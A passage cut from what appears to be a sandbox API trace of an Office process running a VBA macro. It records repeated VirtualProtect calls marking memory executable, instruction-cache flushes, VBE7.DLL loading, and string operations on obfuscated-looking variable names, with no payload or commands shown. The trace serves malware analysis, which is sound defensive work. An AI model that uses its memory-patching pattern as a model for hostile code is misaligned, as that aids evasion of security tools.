dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.324] GetCurrentProcess () returned 0xffffffff [0112.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0112.324] GetCurrentProcess () returned 0xffffffff [0112.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0112.324] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.325] GetCurrentProcess () returned 0xffffffff [0112.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0112.325] GetCurrentProcess () returned 0xffffffff [0112.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0112.325] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.325] GetCurrentProcess () returned 0xffffffff [0112.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0112.325] GetCurrentProcess () returned 0xffffffff [0112.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0112.325] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.326] GetCurrentProcess () returned 0xffffffff [0112.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0112.326] GetCurrentProcess () returned 0xffffffff [0112.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0112.326] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.326] GetCurrentProcess () returned 0xffffffff [0112.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0112.327] GetCurrentProcess () returned 0xffffffff [0112.327] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0112.327] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.327] GetCurrentProcess () returned 0xffffffff [0112.327] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0112.327] GetCurrentProcess () returned 0xffffffff [0112.327] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0112.327] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.328] GetCurrentProcess () returned 0xffffffff [0112.328] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0112.328] GetCurrentProcess () returned 0xffffffff [0112.328] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0112.328] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.328] GetCurrentProcess () returned 0xffffffff [0112.328] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0112.328] GetCurrentProcess () returned 0xffffffff [0112.328] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0112.329] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.329] GetCurrentProcess () returned 0xffffffff [0112.329] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0112.329] GetCurrentProcess () returned 0xffffffff [0112.329] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0112.329] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.334] GetCurrentProcess () returned 0xffffffff [0112.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0112.334] GetCurrentProcess () returned 0xffffffff [0112.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0112.334] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.334] GetCurrentProcess () returned 0xffffffff [0112.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0112.334] GetCurrentProcess () returned 0xffffffff [0112.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0112.334] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.335] GetCurrentProcess () returned 0xffffffff [0112.335] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0112.335] GetCurrentProcess () returned 0xffffffff [0112.335] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0112.335] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.336] GetCurrentProcess () returned 0xffffffff [0112.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0112.336] GetCurrentProcess () returned 0xffffffff [0112.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0112.336] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.336] GetCurrentProcess () returned 0xffffffff [0112.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0112.336] GetCurrentProcess () returned 0xffffffff [0112.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0112.336] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.337] GetCurrentProcess () returned 0xffffffff [0112.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0112.337] SetErrorMode (uMode=0x8001) returned 0x8001 [0112.337] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0112.337] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0112.337] SetErrorMode (uMode=0x8001) returned 0x8001 [0112.338] GetProcAddress (hModule=0x693e0000, lpProcName=0x278) returned 0x694663c4 [0112.339] GetAsyncKeyState (vKey=3) returned 0 [0112.339] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.339] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.339] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.339] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.340] CRetailMalloc_Alloc () returned 0xcb7abe0 [0112.340] memcpy (in: _Dst=0xd015168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.340] memcpy (in: _Dst=0xd015270, _Src=0x197404, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0112.340] memcpy (in: _Dst=0xd015168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11300386, cbMultiByte=5, lpWideCharStr=0x197204, cchWideChar=6 | out: lpWideCharStr="CDec") returned 5 [0112.340] CRetailMalloc_Realloc () returned 0xb1a2cb8 [0112.340] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e0386, cbMultiByte=5, lpWideCharStr=0x197264, cchWideChar=6 | out: lpWideCharStr="CDec") returned 5 [0112.340] CRetailMalloc_Realloc () returned 0xb27fe30 [0112.341] memcpy (in: _Dst=0xd015168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.341] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="\x96\x96\x96\x97\x97", cchCount2=-1) returned 3 [0112.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302e3e, cbMultiByte=6, lpWideCharStr=0x197204, cchWideChar=7 | out: lpWideCharStr="–––——") returned 6 [0112.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c032e, cbMultiByte=6, lpWideCharStr=0x197264, cchWideChar=7 | out: lpWideCharStr="–––——") returned 6 [0112.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c032e, cbMultiByte=6, lpWideCharStr=0x197264, cchWideChar=7 | out: lpWideCharStr="–––——") returned 6 [0112.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c032e, cbMultiByte=6, lpWideCharStr=0x197264, cchWideChar=7 | out: lpWideCharStr="–––——") returned 6 [0112.342] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="\x96\x96\x96\x97\x97", cchCount2=-1) returned 3 [0112.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c032e, cbMultiByte=6, lpWideCharStr=0x197264, cchWideChar=7 | out: lpWideCharStr="–––——") returned 6 [0112.342] CRetailMalloc_Alloc () returned 0xcb27158 [0112.342] _mbscpy_s (in: _Dst=0xcb27158, _DstSizeInBytes=0x6, _Src=0x112c032e | out: _Dst=0xcb27158) returned 0x0 [0112.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0bc2, cbMultiByte=13, lpWideCharStr=0x197274, cchWideChar=14 | out: lpWideCharStr="_B_var_–––——") returned 13 [0112.342] _mbscpy_s (in: _Dst=0x1972dc, _DstSizeInBytes=0x6, _Src=0x112c032e | out: _Dst=0x1972dc) returned 0x0 [0112.342] CRetailMalloc_Free () returned 0x1 [0112.343] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0112.343] memcpy (in: _Dst=0xd015168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.343] memcpy (in: _Dst=0xd01516c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0112.343] memcpy (in: _Dst=0xd015168, _Src=0x197254, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.343] memcpy (in: _Dst=0xd015168, _Src=0x197254, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.343] memcpy (in: _Dst=0xd015168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.343] memcpy (in: _Dst=0xd015168, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0112.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0112.343] memcpy (in: _Dst=0xcb7ac58, _Src=0x197484, _Size=0x18 | out: _Dst=0xcb7ac58) returned 0xcb7ac58 [0112.343] CRetailMalloc_Realloc () returned 0xcb7abe0 [0112.343] CRetailMalloc_Free () returned 0x1 [0112.344] GetCurrentProcess () returned 0xffffffff [0112.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0112.344] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.344] GetCurrentProcess () returned 0xffffffff [0112.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0112.344] GetCurrentProcess () returned 0xffffffff [0112.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0112.344] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.346] GetCurrentProcess () returned 0xffffffff [0112.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0112.346] GetCurrentProcess () returned 0xffffffff [0112.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0112.346] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.347] GetCurrentProcess () returned 0xffffffff [0112.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0112.347] GetCurrentProcess () returned 0xffffffff [0112.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0112.347] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.347] GetCurrentProcess () returned 0xffffffff [0112.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0112.347] GetCurrentProcess () returned 0xffffffff [0112.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0112.347] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.348] GetCurrentProcess () returned 0xffffffff [0112.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0112.348] GetCurrentProcess () returned 0xffffffff [0112.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0112.348] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.348] GetCurrentProcess () returned 0xffffffff [0112.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0112.349] GetCurrentProcess () returned 0xffffffff [0112.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0112.349] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.349] GetCurrentProcess () returned 0xffffffff [0112.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0112.349] GetCurrentProcess () returned 0xffffffff [0112.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0112.349] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.350] GetCurrentProcess () returned 0xffffffff [0112.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0112.350] GetCurrentProcess () returned 0xffffffff [0112.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0112.350] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.350] GetCurrentProcess () returned 0xffffffff [0112.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0112.350] GetCurrentProcess () returned 0xffffffff [0112.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0112.351] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.351] GetCurrentProcess () returned 0xffffffff [0112.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0112.351] GetCurrentProcess () returned 0xffffffff [0112.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0112.351] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.352] GetCurrentProcess () returned 0xffffffff [0112.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0112.352] GetCurrentProcess () returned 0xffffffff [0112.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0112.352] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.352] GetCurrentProcess () returned 0xffffffff [0112.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0112.352] GetCurrentProcess () returned 0xffffffff [0112.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0112.353] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.353] GetCurrentProcess () returned 0xffffffff [0112.353] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0112.353] GetCurrentProcess () returned 0xffffffff [0112.353] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0112.353] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.354] GetCurrentProcess () returned 0xffffffff [0112.354] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0112.354] GetCurrentProcess () returned 0xffffffff [0112.354] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0112.354] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.354] GetCurrentProcess () returned 0xffffffff [0112.354] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0112.354] GetCurrentProcess () returned 0xffffffff [0112.354] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0112.355] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.355] GetCurrentProcess () returned 0xffffffff [0112.355] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0112.355] GetCurrentProcess () returned 0xffffffff [0112.355] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0112.355] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.356] GetCurrentProcess () returned 0xffffffff [0112.356] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0112.356] GetCurrentProcess () returned 0xffffffff [0112.356] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0112.356] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.356] GetCurrentProcess () returned 0xffffffff [0112.356] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0112.356] GetCurrentProcess () returned 0xffffffff [0112.356] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0112.356] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.357] GetCurrentProcess () returned 0xffffffff [0112.357] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0112.357] GetCurrentProcess () returned 0xffffffff [0112.357] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0112.357] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.358] GetCurrentProcess () returned 0xffffffff [0112.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0112.358] GetCurrentProcess () returned 0xffffffff [0112.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0112.358] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.358] GetCurrentProcess () returned 0xffffffff [0112.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0112.358] GetCurrentProcess () returned 0xffffffff [0112.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0112.359] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.359] GetCurrentProcess () returned 0xffffffff [0112.359] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0112.359] GetCurrentProcess () returned 0xffffffff [0112.359] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0112.359] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.360] GetCurrentProcess () returned 0xffffffff [0112.360] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0112.360] GetCurrentProcess () returned 0xffffffff [0112.360] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0112.360] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.360] GetCurrentProcess () returned 0xffffffff [0112.361] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0112.361] GetCurrentProcess () returned 0xffffffff [0112.361] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0112.361] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.361] GetCurrentProcess () returned 0xffffffff [0112.361] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0112.361] GetCurrentProcess () returned 0xffffffff [0112.362] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0112.362] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.364] GetCurrentProcess () returned 0xffffffff [0112.364] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0112.364] GetCurrentProcess () returned 0xffffffff [0112.364] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0112.364] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.365] GetCurrentProcess () returned 0xffffffff [0112.365] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0112.365] GetCurrentProcess () returned 0xffffffff [0112.365] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0112.365] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.365] GetCurrentProcess () returned 0xffffffff [0112.365] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0112.365] GetCurrentProcess () returned 0xffffffff [0112.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0112.366] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.366] GetCurrentProcess () returned 0xffffffff [0112.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0112.366] GetCurrentProcess () returned 0xffffffff [0112.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0112.366] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.367] GetCurrentProcess () returned 0xffffffff [0112.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0112.367] GetCurrentProcess () returned 0xffffffff [0112.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0112.367] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0112.367] GetCurrentProcess () returned 0xffffffff [0112.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0112.367] SetErrorMode (uMode=0x8001) returned 0x8001 [0112.368] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0112.368] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0112.368] SetErrorMode (uMode=0x8001) returned 0x8001 [0112.369] GetProcAddress (hModule=0x693e0000, lpProcName=0x234) returned 0x695bb15f [0112.370] GetAsyncKeyState (vKey=3) returned 0 [0112.370] VarCmp (pvarLeft=0x19790c, 